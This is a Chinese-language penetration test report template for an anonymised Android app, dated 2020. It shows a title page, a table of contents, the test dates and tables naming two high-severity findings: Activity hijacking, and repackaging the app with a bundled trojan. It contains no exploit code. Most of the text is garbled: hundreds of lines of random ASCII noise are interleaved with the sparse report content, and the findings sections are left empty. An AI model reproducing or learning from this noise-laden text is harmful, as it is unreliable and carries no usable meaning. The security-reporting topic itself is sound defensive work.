7 U; U5 h- u, c/ S7 i) Z
) o8 O* k4 G+ g/ O( U4 S* ^
* j* d2 k7 N$ J( ]6 i9 ^
' B3 H& q6 z4 J% R) _
/ L3 m8 Y" c& v" w- Y
5 ] x3 E7 S0 c, d( d* c, q( D
; N. p" ]8 Y7 \' X+ H7 J
, D, V1 z B% ]9 C: I
/ U# Q. e7 M. c& H& ]
% R0 j! I7 _( \4 W. l % `3 ?, N2 w! N! B" \- Z% s
6 j, R% x! m- I. ~9 E e
文档编号:
% [ t4 Q$ q$ z; e# d8 |
% o g2 { Y0 G0 ^$ n
/ Y- V% M( Q" L& v3 ?! a9 m1 d
& I( [: o8 @% p7 c
! p9 B2 @/ m8 a5 o" P
1 k4 _( A0 Z# e3 G$ h
9 S& n& p# s& c# _0 z+ j7 @7 U0 G: Y& b2 i& ^( C! Q, i1 @; x; a! n. V
! G7 I* q; j0 s3 h
& x: w+ _4 S# d4 l8 r
e) [4 t7 j3 K. H6 _% L7 d6 w4 R* J( w
, |6 T" h7 a0 I z7 r; N0 k6 O* o$ O, O
0 W& c4 ?) E5 N9 R9 @- ?3 ]
. d: i% {8 h8 e) E$ V& t' o
# R+ l/ E$ r% y+ Y1 Q& Z
$ ]% h" X* N, {
3 @* m: }7 c- S5 X$ y7 W/ N6 X$ }
+ X9 [! \5 [0 J" X. n6 _: r/ a: x$ q5 d# N; k7 [
6 _6 y4 ?, e4 L
( O+ Q% A9 a2 }) o/ V
) f* n! y* _- G. z
+ m$ ?9 C0 v% i4 p
% E Q; h5 e, T w4 \
_1 ^$ W8 o: X" E+ B0 \* V + e5 [8 ]8 t2 D
3 [, ^8 B% b1 [: e ' ?% F) h, h! ?' L+ K6 C* R: e
- [' p& d. i7 }3 a
8 F4 l& a5 M9 l9 ]" r9 s" M
9 E9 L+ e* t& f, D# X5 x1 R
( u9 D# i6 r# |9 E
7 z. B: i& H3 d( X: j8 _4 I# U 某某某APP渗透测试 ; @$ `3 L7 h {9 r
7 Q& v4 @9 O: d) T; o: n. ] ^
1 U# Y A9 x9 l* |& j
9 F' q/ F7 a; X1 p
" e1 @6 ?- b. D- v
* @9 U% e+ V6 i J& I
U( F U: ` \- d' a, g8 Q1 k% c1 F2 w4 N& I
5 J2 E* s# Q9 k! |! v) D
0 J' O% w/ i! u- M, `
0 }+ H; U$ Q* n# \- s
) P' X# m2 T! {' W7 q6 V9 M8 m1 I8 l
7 p( O6 ?' I3 J1 \! O7 O
3 q2 h. _; v) f! o1 Z/ \
4 h* [# n0 F9 c, @
" r+ J. b0 l. K {2 E! N0 W- [! D
; O/ W# {* W% l9 I0 k5 _8 ]: p
3 ~$ @, ?9 i7 w1 V( }2 M ; R# \7 c7 I- R! D( } ]
0 I; S. }% O) Y
?- u% O) b. X/ `- [- O3 l% A8 |& d8 R; f _8 h! f' k, V% F
; z5 Q, L( f* b+ T% T5 L
8 f; _) O4 Q' z9 ] # |9 j# n# q. O, E5 J
. L# y# e" Y: r; c
# `6 V( m3 |# ~, K
, q4 J2 B2 P# D' p! J. l* t' b; V) z* T
$ a* O/ M" p( p0 d: f) X; u1 U. T3 w5 a% E% p# B, a
技 术 报 告
' k" e/ P# ^6 y2 |# C p2 @
" F- q( ~- P; k% L5 Y0 }9 D3 O
$ u2 y z2 |" R( a/ \
8 R, U3 I' y. D7 G
5 [6 `9 D) ^6 E* P# Q
, U7 y" f" q; e9 x6 C6 c+ [6 W
% v# h" Y9 A |4 @: @
: l) ?1 t: `0 e: R! b+ O
& Z( v: L: e( N9 a+ ~, I* k5 q
, s" u& }" Z$ g! u+ |
& X1 y+ N T; d! P% P- e& N
% M) N, j) r) ?* j6 ?
& z e! F# m$ ~& Q
5 y$ D& z" [; ~- ~; {
$ S& @3 ?# d# ?# E) A
$ |' U8 _ J9 t% y8 }; m
. m I# K* ~" {$ s8 Q! D: R
4 n5 M }/ X. u2 k* s5 k; s5 S ; j/ M) r. T7 ?6 M3 i! C' X
[! y% E: p+ q" V
9 Y' }& l2 x# I8 H
* B& F' S' K- y; e. V
: |! ~: V& m5 [7 ~ y) j$ ~
' {8 Y1 P Z5 ^3 q/ L
6 I* m6 l, ]5 b: z2 \# |8 D
& _5 o& `- W2 q9 ]# i# ]
& {" V% Y8 ^' n( f. T# D
! D, T3 V5 a" M' V/ M
7 s0 g' p# i' |) _3 H4 \2 L# d
, `5 h6 @" X: [ * A" K- f9 [% z: M) o. v
5 G" P. k8 D1 n8 {: `0 E
, B8 C% M# ^. H+ \
6 A0 A0 V, ~9 [, T5 ~
! C4 H. v* h d$ q" s
: ?8 D s$ }1 U: B. r$ S- @
6 U. J1 C/ x+ ]
4 u1 {# L9 ~& i! e5 i8 E8 }0 n2 x. @. l
2 V$ M" f ]* c" v6 W) _
- @3 j: E6 w* V- S
! ~2 x/ |, B( ^. D# l. d
* W ?) h! Y5 ~ w, i
9 [0 `: f* Y* y+ e: |2 C, j+ ^" x% [& I- }9 p
: m6 b& D9 Z+ Y( c9 U
6 I3 p( U7 |# w$ j
4 X+ t" K6 K3 z0 I
' w/ V3 y% j* }7 [ 0 ^# L, ^# |5 r$ u% G9 d8 z L
7 X- i8 g8 q1 _" n7 N! {
: E3 n7 f0 z- K- U& N; Q
& X. ^( H4 Y# }9 V" V* f" k. `
. x4 H, M2 P* g1 P2 ^! n/ V h! z. ^- U) e ^# L" T0 ?
; Q; o9 h* d5 c* `/ ^; ^1 l5 ^ X0 a5 W$ _& C; L5 o
, A% V- W: J" y {# x! W; h( e( d3 n$ W; e8 n( p
% H" P7 j1 u' t1 J) v1 _' g6 h
i( s' J5 W( s" e- O6 Q
3 p; x2 i3 ~1 t# D- o
7 Z6 s' i9 e6 r8 J; q
: z% h, W$ f# O4 n3 @( t2 ]0 B
. H0 k5 Q y$ Q4 C; r* w# q
6 F# C( U; ?( }8 D6 F Z' h
; ]* N6 k# S+ @7 _1 m- s: q
# Z, e! T W6 m2 g4 X% x0 r, j2 |" y! L) d
9 b8 w" s/ F: s
: \ S7 C4 |6 @ m6 s . t* R- ?0 u; T# j
' B) k& y% Z# Y0 u) H/ K
6 {& G3 l( k) x2 c& }! _/ v
+ G. v+ _, k) i8 H
& g% d9 |: w7 R+ ?3 P
; x& v& G4 B% [1 {8 ?. [9 S4 L : ]1 q; e* r. _
8 [ V. k6 R2 d& G+ ]
% @# B6 D* `: p' r6 {; s, H! |2 m) E
5 _- [* y# _8 }/ c% O2 F2 d) E# P$ e
2 `3 N+ ?9 C& z9 F1 m% W: H- E* z4 h( q7 W
& x( p9 e, r j/ W& h
; s" c2 _) F. a. l* T" Y g
/ D: G. B. g- J, q. d* [& C0 k; p) S2 ^# E3 Q D" X9 ^
) f+ T( C4 e; f9 j8 u1 I- i2 M3 w! B/ k% \8 \
: k1 v: a- _# w' E) c" P8 i
8 W; W% W# f( n. I& m5 l" }
* i L- P! E; M( B
2 W2 z9 T$ ?. f! P% h$ y
( V6 |3 W8 x/ b. K5 c
$ K' M) |; M" y5 }/ g" t5 X * Q5 ^# u* ?0 F& e7 @0 `
9 W9 _& V3 |/ @( ~! d9 E `. L9 ]
* L( ^: u0 V6 s3 i
* n) m$ p7 h- K! S; G# i1 T- `
C) ?; D/ X4 L+ e ]4 p9 s- S( c3 z& g/ Q8 m
0 I: y, Y8 C9 }5 J, w1 O
8 e1 o: t0 b9 Q9 A, Z
A% o' \% `. |) k' R9 l1 J
. ?% j8 y0 O3 a
) A% g8 s3 m9 k& w7 V7 x1 R% y8 L
" B1 W" f+ y6 z2 R; q. h
; L/ t0 s' ~4 A/ h
. X1 s! N) c ^+ A! y1 X
/ m$ Z" W" P* ]& B: L4 M% p
0 U, O3 _) n' ~
; q: T( Y" F% @8 ^; X/ u4 ?) D7 W: H5 e
二〇二〇年 8 }% W N, p4 m
9 E4 P" U- U* B2 P, T' _# \
( ?- C! _$ {, d3 V
+ I1 a. L" y+ I" K0 B8 H- T5 Q
+ B4 d# }4 E+ l9 \! a9 K# [7 Y7 u' O9 E8 N' @
~6 T: @- n# |; f0 E! s
8 H, j' e7 Q, J" b2 Z" }
4 |/ [9 ]. k; K; I
1 q2 j! p* S8 }: u( R
$ M% L# R D* F. g2 k$ b' E/ b6 c5 j) i6 I, K$ g) p) k5 {
2 M0 L- b& x+ E3 |* C! k+ r6 L
- G' Z! g. }' y& w' u2 `
# n: r: \2 O0 ~8 o- b# M3 i" k2 _9 J4 e1 `: h
6 T# g/ r* H& _' k8 ]* J
! a3 ~1 k+ ?) M+ @" }8 H) q9 ?
; s0 k, \+ I0 [7 h
1 h2 a- ^% z. ~3 L
! @& U! X; c& }* A. ^
7 ~5 K; y4 c {) ~ 目 录 v* n3 l; ]. j1 i' U/ y
: v! G. E2 f9 ~$ o+ g
5 j; ?9 \: O; `. t% S+ Y" `
- W2 ^ h6 t+ s , N! Z$ Y& l6 b$ G8 E" A2 A
& H& Z6 Y( E8 n* W) F* V9 x6 h
4 i4 A- ]2 F" |" J/ q" M4 j- D* {: y' t6 Y
# a/ e7 u1 t9 Q
- I) ]' j# N- z
; I" E# Y3 M0 B5 q
/ m" x1 \: ]8 \9 k: I6 P
D, [) o! I# n1 M6 e3 s: I
9 W- z% O) c5 l( ~: A+ @, p 1 概述... 3
# q1 v1 c# t; t9 e0 S2 @
6 ]# N8 I, Y( o: \- c" L
& O) I( p, t* p6 v2 U" Z4 c
8 R, V& e5 _2 W) l* T& g& X) o
0 w. q N- c8 i0 g8 \- O1 i
3 ?' T X3 A( Y/ L1 j 1.2测试时间... 3 3 W/ N J7 U& x! q- s
% q8 {& A4 A' ^% [
1 ?0 H4 U! K$ ?8 c$ |* z3 { F
5 r( f. n. s6 Q% l6 l# @1 O, F
4 n- I; N, H/ ~5 M) a8 E
. M F/ ]0 S, o
1.3测试对象... 3
- q1 a, a0 h* a7 q& Q0 k
+ P9 g$ p: x9 r4 k* z( }
( v' f ^) K J. B
$ o/ a& j( z8 N% f a
/ H: X7 M, S8 |8 o1 N7 }2 ]+ U8 Y
) N, g3 k4 I( E! X% }- s3 A 1.4测试结果... 3 9 X! l( f- P6 e7 e7 H1 v# ]& H4 q
' X9 E- n( d5 j$ M6 s/ m: E
. k6 X2 O+ U4 m$ j, `& R" w% ?) F8 b5 p. M0 C) ~
) }; L0 E7 T6 C
4 V/ Z7 b! @. \: v. u$ \5 v
2 检测结果... 4 1 l) R. f$ S/ r) _/ L
' |8 U. T: F* z/ g
, e* @/ [5 J; i# A% Z6 ^( m6 r2 F' w5 h% L# Q, {. L$ j- @
5 R" @9 b5 y! X% g$ ^! Z
, m; x+ A; B1 C 2.1 某某某... 4
- E4 J. {2 y2 C% L) R& `/ r$ G( ?- \- w# l
0 N4 _- }7 E) T! `8 S5 b1 \
- p3 ?1 J3 s- y7 _0 g5 y' a5 {* }& k
/ s0 _5 o& p# i& w, B
3 x' F3 x3 y4 W 2.1.1检测目标... 4 & f6 m w Y1 x5 F
( T' h$ q/ i+ k- H& g6 Y
, d) V- W/ V6 z0 [7 i. t; r+ W
) y! W: ]* v, ?% s
) g/ R4 i0 y7 _+ ~& l7 p1 V
9 o3 L3 _: m8 \! O 2.1.2检测结果... 4
$ s1 C$ q9 s5 Y7 G# p% H
/ q0 z; }& H& Z$ T% [9 @5 X" q
/ [- Y4 M* e" ^, i6 V
$ S5 `% U. \6 l k8 r / u6 L: f, u& t# u
; p; b6 }0 U9 j8 ~: m 2.1.2.1. 4 $ C( c: v3 Z1 g6 a
& t- c1 U- c4 e' i
, P& [4 U: U( g t% g' ~4 ?- F$ Q0 D& M! {! x2 k3 ^; a
: j3 k3 X" P. k& D# C t, g9 J2 W) c* v" E' b
2.1.2.2. 6 , W5 _1 S y4 J M) D3 i9 {
* J! O" M6 V" J+ { P/ _
% n/ G' s% F2 ?3 Q; Y% U! T* b6 ~. x0 N
. C, r8 S, h p
3 u% {, g* F! m" p
4 G8 Z! P. B# C! i( @2 W& b ) D& Q% n2 U2 C, }# e' X" Y
3 W. [' R3 ~7 {" q
, G, c5 V& H0 M* M4 S* \% A( M
6 w: M5 h4 H0 {! L, E _/ R4 \3 d( C2 q1 P; s/ z
, K. A |) x3 T" M% j
6 `* [, g$ Q7 y0 \' l$ d; _; \/ U
, f$ j5 x" b/ ^+ r2 h8 v, n+ L
9 V1 n! p" M5 _$ _- n
* H% d3 `9 }4 J4 V, Q( k
* d! K0 r) p! V5 w! Y) e* T$ k* u
) S( \2 d* U- E d F/ E H( _# w [0 A
1 概述
; }8 E& y' k7 B$ ^
( E( o# `% w# t b
- ?, _' m+ q2 m# q& l) t- C, ^+ w
+ v8 c# X7 B8 x& C
7 A* Q8 I4 r( X* R; j6 G5 ~5 u7 R0 G- Q. _2 b
1.2测试时间
$ f, c5 P5 N0 H$ M; W
/ \& j( t" X+ q H J4 ^* X. N
: d8 k/ L7 t# ^, E7 G D6 O+ }* D+ G
1 k; L/ p$ m& {3 k4 G% V 2 u0 M% }7 _9 s- Y
7 v7 r6 ~1 L l5 r8 _ # K( |, M' a( l& C: n& j
( {3 |2 ^. z7 o4 k; `9 Y
; V5 H: t9 l d$ o" H' M2 Y4 D3 n
& }; s3 u3 f: k5 N( L |
O5 n* U. u. U6 e" H0 X$ g) p/ k
9 ]+ J) m. f/ C3 p% b" \
& q* ^- d* O0 Q. g! Y$ g) ?, ?* _ 渗透测试时间
& v0 W" `. y% f- ~& M
Y& x$ \7 b" t& e. h
" e9 {+ l2 x; `3 |/ X1 T0 D4 A3 V5 y7 ~6 j7 R
|
6 n8 i0 ?. x# P- C2 q7 ^/ u& ]- O
& a) E9 q5 T/ l7 f% p. r
1 u* L) D' Q4 |) B7 [1 o
! e4 u& h7 a6 X% w
( M5 k l/ q. \* D" i6 p& f- b, J/ l
|
: B" F3 E) x% q5 j0 h% n" M5 `! m `) C
- W1 A$ q! L* ~% W$ k. R4 v* d: s
起始时间 $ \9 \$ G4 K' c x
9 D, A' k% k' a) `1 U W1 Q
6 }8 x" C7 r) { n% a
- w/ @6 }+ f" Z, a$ j# [ |
! k/ X( ?+ t+ H m/ k2 |0 O4 `5 W7 J6 z0 i) r( N; J+ j
6 ^1 y- D( l# L# r8 r& b
6 H; m) i6 W! K; o: ~" u) n+ F; F
1 ~5 V- F) S! G) V0 _: w: `( V
0 G1 J* X: G7 T; }+ Z 2020年4月6日 5 |' E& T5 `! i- {5 q+ R7 g% Z3 d
6 t; e$ |; B3 W( V3 ]' p
+ w+ M# s$ Y4 s/ K; B
: y2 W$ v: A, M2 M: x/ l) q8 S | + \3 e, r% V9 M% b; r) a
' u: [7 l6 ] O G9 K- `
! i# i7 {3 e% }; A' @ g: I$ M( c4 _0 j* p( j6 c$ c
\! p9 D- u! u6 y) {% C# D8 z
; w4 c. W/ _* _& ~( P4 l
|
' y7 I, R' {, e: c! W2 F: V p# I; | B
( j" T3 _: x9 q8 i' I* H
. [! Z" q) [0 V: z 结束时间
7 a3 w( c5 A4 [8 q$ }( O8 W
6 }, I }1 b, u 1 c1 a4 P. F( D { Q; T! `7 q( F
( ~) V2 L, y0 U) Y
|
0 S8 X1 _/ t: `7 ]0 m
5 X! _/ A2 O; H3 ]
2 ?# t" W, k. o3 z0 E, [/ v9 G+ j9 l! K4 L* z+ a: e, O
5 Y4 i: I- w/ p% r' W
5 d' G: |" R, k, D n$ m 2020年4月9日 " r$ v2 p. E9 N
5 {( F% e7 w* z8 b8 c6 C- b * P( H" ~% V+ e |! W l$ l' g; T
. V9 F5 M- c9 J1 m" `7 N# C1 T2 ~
| : ?1 F6 B8 \; b% A
: L/ w) L& c; Y: s. _4 ]4 m, N
! l' {: p& }5 ?- r* b
! ~6 B/ c8 y f; t6 u5 c
% ~, Q0 q) C7 C) F( [
$ @& Y0 m' V( T) [) ?
# g7 l9 F+ K" L+ |1 G" a4 u B8 Z' d
: s" a3 G3 r- P* A/ K) Q5 {9 v& T
7 ?. \$ _6 \: ]7 _: T* O% _
# C* l% |/ U9 g$ p 1.3测试对象 ( P* I' L, h% F. ], D6 i7 p# y
7 K' w& w, A6 K* U7 J f
5 |& S7 n3 z4 b& M, E
) k# E3 D; n" {: n/ d& [$ l) c
2 g. u5 f4 s, X# Y, ^
. ~# @1 @+ O; ?- f) t5 k* ^ 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
$ a7 ^1 X3 a! A e+ B( a( I. s& P
! }. z/ B. Z" z( P/ \
% z8 |* k. u" M
/ c, f: n* l# ^8 Q: z' l1 `4 ?- L # T) o3 v2 B" C8 O( k! a* _
1 u7 `. i y0 D& s3 r
表1-1 检测对象
2 `' A! g% x8 b. e( G+ j& c) Q
1 t2 X- b' e- }) L: u+ C
4 t7 T, `# [4 L# s/ H7 s
% E3 l4 }* N/ a. n g 6 _+ x/ q. i# Z$ l3 l" X3 l
* S _2 l2 R; Z
3 A) {& b; J* ~& [* Z1 X
2 y; L% E) t' {2 G; Z4 W" Z
3 R) j* c4 y* E$ x' c
# o6 w& P. C, Z7 E; z- c* S | * }, d4 B/ L- f6 n+ ]7 `
* c, i1 ^$ k6 S& c S
$ P' s, w. _0 R N
# U3 z+ z/ D( G6 ^, h# n 序号 7 ?+ A% a, k8 B5 v
$ @, m4 X" S Q- O, N5 W- a
) \( D7 P0 j4 {
' w. @. p# W' f4 B7 S6 w | ! H8 V9 [8 g3 T
N/ a* X: y6 \, {7 l+ K7 `+ o: l
1 z. U0 }. s! ^2 E; q9 x$ ~7 n) r' j$ r, W
0 }7 B4 j( j; W4 X) y
9 J) H2 |& b+ v i& w 测试对象
( }; P2 v/ D/ Z0 @+ x- v
1 x+ ~& `% F R2 C
2 ]0 p0 F4 `0 a, @8 j4 S. h
9 ?. Z0 g4 A' j, M |
+ w- ?, p/ B$ c- Z4 Q! Z' N6 @
6 T0 J1 Z* e" }& ?7 M
8 M" I% x" m+ U" t
( g6 a. h9 U6 M ! \$ x$ N% Z( o3 O \- O& ^+ l0 J- W
: }- e( r. C# }) ]; {) l7 n
测试地址
3 m r* N. V# v
; P$ L, ?! W; x( w* F- M ' `+ v0 P4 }$ C9 i
. S8 U- d: ~) A: y' e+ A |
+ w$ P) o Q2 V. y* O( y
% W2 w) r9 b) A9 s' N' {4 p- [ & |( m8 m6 {4 ^: _5 ~ ^. g
1 Y( N. j2 `$ k* o9 |
4 w9 g; K0 \! j! j
7 I: P2 h. [7 N |8 I! m, V7 { 安全漏洞 8 r! K4 A1 \- _9 L! H! N2 }. m
- Q+ W8 s9 Y' X' k p " D% L2 ]! u }) r3 P9 g
1 y/ Z4 r" \+ S2 T5 |& m
| : C! D7 i5 h3 a! Q! B3 f# ?% V1 c
. R8 q- ?1 }' z6 b) x
9 O) \7 j9 u) s1 D- G0 W
5 ~( z: o: k( p
3 _0 e5 s6 j0 p9 C5 {# N
3 ?6 Z9 d, t% B4 k) ?/ } | 9 ~3 l6 a+ p% n2 k
$ J y `' r% }+ i1 G5 H
7 K0 y( t8 r$ U9 A
% _6 A$ o' k! ?: G p6 B 1
% }$ S6 S; K+ a. f( f W) H6 h* Z9 M2 V: S E$ Y {/ I5 |
8 ^, D, b" F9 v0 g( N9 y" i0 _2 M, N4 u, C$ I6 s
| 4 M+ i# [: n) \. t- I
/ m- |: R) ]9 ] j - c, y9 Y/ J: u; e
. p' Z1 O( B7 o% B6 K
" q' Y/ w; \& m* I! t2 B
G' P9 h9 G% I. W( y2 T; I 某某某安卓APP
, b+ ^. ~3 _2 J+ k; g& r. k7 {" r% R
G t7 s6 ?* Z/ S2 N4 V2 n8 K, q9 B9 H& k6 R O4 G( K/ `
|
/ Z1 K- j; s% C p F" w/ i2 m
" Y) V2 Y$ n6 e7 @% H- u
m- e5 f1 N) V S: D
/ j m; ~' T ~
4 S9 O% ~% n5 X0 k* V k8 H
9 F! H$ E T, Q- `8 v2 x6 e
1 f1 y3 B) `1 J8 d5 M5 _$ r
+ Y3 c# i5 p' f% B; U' h5 n
: C( C7 ? K/ q: p' C
' Q0 R! u0 b1 x5 i9 ] | ! f e R; |1 q# E" c
/ `7 i* R7 C+ j6 B, w 5 v" z; ^3 r. M' G3 b+ E
8 K6 O6 d2 E- h1 Z
$ w2 _- w' c8 d- ]7 H% l- u% }# t, t7 T5 ]
2
* P. _0 A2 S, g- _) b, j4 A) }
& e' f( B9 r9 v' I; y' T % d5 P4 _% f8 @; w- y$ y! }0 \
1 e& w) y% s, O" b/ m% n ?7 d
| * x5 e% n8 T: U$ i; k* }+ R' O7 E! {
: T ^& Y ~2 U+ u0 a8 ]5 n
) c: _; T0 S. O* y. `3 z: B
. N( W& q& C ]6 ^- j
8 f& `+ g# t1 Z6 ~6 y) i+ m
6 I6 C2 H0 a# y) X# K$ P2 Z) x
# O' K+ d" h$ ^! I2 H X5 G9 k$ k
/ O( r/ C3 ~; x2 F0 d
4 C ?9 H: Q1 Z+ t9 V- j! z) R- A8 o
1.4测试结果 5 ^% u( y) y0 \# ?# b! c: x3 N8 |5 V1 t
' X! K3 d+ `) d) K) X3 h6 o8 _
& V! J& ~& {) J4 `4 p1 x- M
! P8 U1 [, J8 D$ o
& A- Q# ]( o& O" D! g& u
4 h$ ]) h6 i& I/ {' u 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
. v" l A! p5 N- i) m5 F6 y) S) T7 J
* Z: i: L2 Y+ `
6 m; n& E- e9 L5 |6 s
b( g6 r3 H" t7 \3 G" j' `+ w% H- Y1 n% h1 R6 Y; Z
$ w2 z5 y- U l1 b a0 |) `
5 P, X6 H" Z/ O5 {: B+ J
/ [+ R0 s8 b" @" i# ^
1 O$ G. @" Y1 E/ ?
`2 ~0 i- k% B. A" R' m ?( {; \* }. ?% K9 m; T' U' B8 Q
& x& O# y+ ~9 ?: e+ Z
& K1 j( p" ~( B- Y& d
+ o7 L. Q* o! }* F
& t2 p0 }, z8 m& U9 Y8 s
1 i: w5 X- C3 F2 `& V6 |" v$ v5 ?* _+ t- P8 j
| - ~/ G; `5 s4 I! G+ {
7 k8 q) }" N- K4 T
" h( t7 |8 I# U! u5 {$ @( n
# n& y, w' m6 Y0 `6 @: Y- G
序号
! j5 ~/ P8 K) m) Q) w& X. f6 Z8 I# k: O: A
9 Q3 W. i; I9 c
: R; i) \ w" f6 j5 S" y6 Y3 M
|
4 L2 ?" l! q6 O6 I. Y9 M0 |2 L/ X t: F+ I: A$ \
& O- f/ q0 `" d2 ]4 c* e) L+ V5 h) U
2 k# `+ m* ?& \8 U0 R
. W+ Q# ~( A6 W2 N4 t" b- W) M; f2 V. w" B
系统名称 * p; W; ^/ V3 B* I
- X; n7 O0 x6 }: Y3 s ) D9 F. e2 d, x7 n( M
3 S5 J6 C/ s/ A |
4 X: K( W8 i' Z, \; h
+ ?3 j9 s; C: h" P ( h: W4 J/ D/ B$ l A5 |% G% {4 X1 G
& y% _& J$ i/ H; b$ y. M: @0 a6 Y
4 e: C4 i+ W7 K
1 f% Q2 J" \3 W3 i2 f' t) U; ^ 漏洞名称
! \# G z! @* d. [" R l% F8 L! L6 J* E; _3 ^$ H
+ h/ k/ W" g* g, x$ j
; B- ]- `# s' a, d! r' { |
% I3 w$ N3 l; b7 W B% w( O
# R d: F2 F5 E+ B3 {3 P
4 L; _$ u1 z* u# n' ?4 Q( M8 v. k0 K" }! O/ r3 q
% F1 p- r3 L/ x1 Q5 q! l# @: Z6 h b2 M0 j9 H& N7 C1 z
漏洞危害
% c! J1 ]# G O6 U
0 `7 e' h& e6 [ ' J4 C/ Q8 } n- p; [
# j; [ m" [8 l% } |
8 i; }% t) p9 b! R4 C0 ~) h) P O, A0 Y" k5 R
% C. a6 D; y" i/ v' F
, i; C. ~+ v. Y+ W, i; e
! j' ?$ x$ O1 u a7 P/ p3 _
! V* f# M1 ~2 }& l$ Z5 c# X, p" J; M 修复结果 ( J2 @, `# h* P6 j5 v+ A% |. n
/ t1 i8 ?; S3 }- A9 K: J% ?/ n U 8 Y7 d1 d* g! H7 ?1 S
7 M' T' V) }% Y9 b3 q |
/ z: y- U8 p0 P6 d2 C# Z8 C
$ u- L+ B) H7 |5 s0 E
1 I. ^8 T" `+ p( d; H+ F1 e+ L' {6 ~
/ q; s! I& ^) }6 H# z
" S$ I7 U% Y% K6 W, y! I1 R | " p+ q: N2 {4 N" y2 R- J' Z
e5 r r* l$ P7 D
# R% L& Z, t: P( y$ r6 |; V, l( j: }6 I
1
, |1 I% H `" u. [+ u* S" T( p2 W0 ]( P9 V3 ?0 D) `
7 k$ ^/ R* V. q" R" b% r- Z* @& o! \& }9 h
|
. c8 A7 ?. e2 n0 n: d# d( e$ j) m+ [3 D
6 ^( U% O, L; T2 }6 I
0 H8 M0 g# t- v& K! B
1 E/ A' f+ u" }3 a0 l2 ^& ?" G; q% O; \$ h% G6 k
某某某某某某APP
; E; ?1 Y7 T: c! x' E& f* D4 _ G3 r. B0 X: ]9 W7 z) Z$ Y( \% M
0 R8 s+ V$ }- i# W! k# D5 n$ ~
, a) ^$ Z( a* q* s7 e" C- a | 5 C4 {6 h6 ^; x& }4 i* F
- O" C2 x: z( l, f0 g8 M: _' m& x
- q5 V6 Q* z2 v6 M( k3 x# q) H3 i( N* O) z4 r
( o$ D4 z0 `, F9 w! K# M
1 y v1 ^2 u$ O6 p Activity 劫持 6 I* N4 s1 K# ]! A2 s
I0 Y, V1 ^$ m3 O
5 U( C6 B& X4 A. c. P
6 L5 _! t3 M) H' N$ ?
! t8 E0 H/ h# Y M) m* i) N2 {2 ^' Q+ _+ p4 ?* C
, O1 C. k c2 q' g* }
# ^# W+ h: Y. y0 j f5 t2 V. n$ T5 Z 0 h; K2 E) V# }9 g
. U& M' M: R! b4 O# A! D4 R. S4 ? |
* Q# O1 K" W1 c2 ?) Z) V# [/ B8 [) p% z: }5 ?0 Y
* O* N. V; h( M# D+ p' q' _; {
% E% A3 @' `4 H+ K, J S
/ a0 Q' [+ @1 [2 m2 X4 k4 n7 z8 l9 a) P4 j, Q: {! ~
高 5 x! T5 j/ [3 f
^1 w& @; W1 D0 w $ b2 ]" Y. L, U9 A6 }' m
3 T: ?: S1 k, f0 j- i9 R
|
$ ?0 D4 c# Y* o) j
; n$ J7 i; ]3 B9 Y& ], ^8 P
3 @8 i, i9 ^7 K/ b' m7 |
6 l8 c; U4 P% _' O' p
5 u4 v, g1 V1 n
; B2 \; F& x3 Z% w, ~
0 l o, ~# `* k" e. w) h7 b& r/ |- M' D
1 M# M% p1 x A# C
4 }8 f$ I, a# i. s! o# S | 8 \! k3 o0 {" I; C4 D1 T P
% o5 H% m( f1 n/ n" B) A* j
9 [3 w, X% T0 U" e7 K3 ]0 Z
) A. @- o4 Z- b5 q1 u
& r' \0 Q* K) h$ N" i) S: }
% y- A! _ t! ~' \: G! I0 w: u | $ @) ^! a: v- C4 f) O
" ^7 d9 n9 v& @6 R2 J / u: l) C6 v; z6 Z# N
1 X: _. F/ d8 g' ]2 g4 E
2
7 |1 `: D* r. S
' m! C* D8 D) K I & ~: X- g" z% G9 s
- a8 i' U, t. E: H9 b$ a7 S; C4 d7 b | 3 ~6 A( b5 ?% @2 r7 H6 U
s( [; B; t% S7 N ( I8 V. `" }% C/ l1 I( I
5 }+ l4 [1 ]" Y r
/ ^# |& k2 p# C$ n
2 s: e2 k% A+ }2 O) p c$ X J
某某某某某某APP
4 T/ H* u# A# g0 Q$ w* k7 T8 E
3 R: O, A2 C) y% \0 x7 U
/ H v( D& ~' y5 j0 y6 ]" b$ L4 v* U6 C( A y0 H
| : m# [; @+ I& v0 ]- m
/ L3 R+ Z2 W# g
5 K6 I! f, k1 \9 [# l4 F8 M
9 i8 I! ^; R1 e& W; y * F' T9 |$ M: { c0 i# b' X' X
d* [' w+ o2 \$ G
反编译二次打包捆绑木马、篡改APP代码 $ C# z: g1 o, r% l9 G
% D2 R2 i2 |8 \9 U/ r6 u7 v, g& ] ' {# k' Q. A+ U e
* @3 _! Y" h+ q$ m2 m | # `. ~2 `3 g3 {% R5 P% E/ S1 C
. \6 Q' s5 s6 l: g m 9 m g: m0 ?. U ~
* H% S+ l8 d) r; A$ R, B
4 r7 }1 h2 R6 `; O
9 M% K( o6 `# _2 n 高
$ ]2 _" s. ~0 {4 u }/ w# t
X. q0 j% V6 Y9 S9 |/ N% O8 R" }& q; Y
1 ?5 Y) n. `' q7 }4 |" j0 `, K# h- [- p; R3 O/ m
|
# L* T0 @2 m! q# \! @) b/ W" C: x% t' i
9 N3 X3 g5 b* \/ j9 V
6 ^0 o/ ^! ?9 @) @+ w# g5 e. B/ O+ n9 Z% O' W- x2 h
& y( @# s1 n/ z# _% D
7 s) F0 v) J4 p* ~, ?$ x- c
! ]' v. A% |' E) F4 P: A8 ]: }9 K7 v" w
$ O1 z( F) V/ y i2 u
, V, K& {" K+ D& E | f' M w6 L( y3 L- R
8 ]" ?: t# i3 Q! p
, f- q+ U) {. _: v
) ]2 L2 e4 U% n ( y- U5 r. C' ?! p) F
7 n- h1 a4 O( ]: k& B
6 h" F9 K4 m- _
4 a1 s5 m9 N3 F( j. X# I- _
, z: b0 r: c: `
, x4 N7 _- b j8 l: l* k9 q" x
( P1 ?) W- N4 Z8 T5 ?* F# n2 Q+ c4 |- k' u
0 Q* ~: P8 s9 M. Q
! L* |+ t y) O3 W& q# R
; {. `6 }. x( A/ u. S% Z! c
3 x3 `- T5 u% j' j. ~. I6 F ( |2 h- E4 f3 C, N& S: [
7 {) k$ }, T p0 i7 |8 [7 P7 { 表1-2 测试结果 # ~: E* d. l C8 R
+ w6 D* u& S$ v( ]3 L
, s5 V( Z" H, r6 ?) d
8 G) e# w; G( R0 ~( X* M
" Y* |3 s$ A0 v& P5 d# _+ o4 A0 ]% ^" \6 R3 l p
x6 ~. K* I; R! R, J5 v
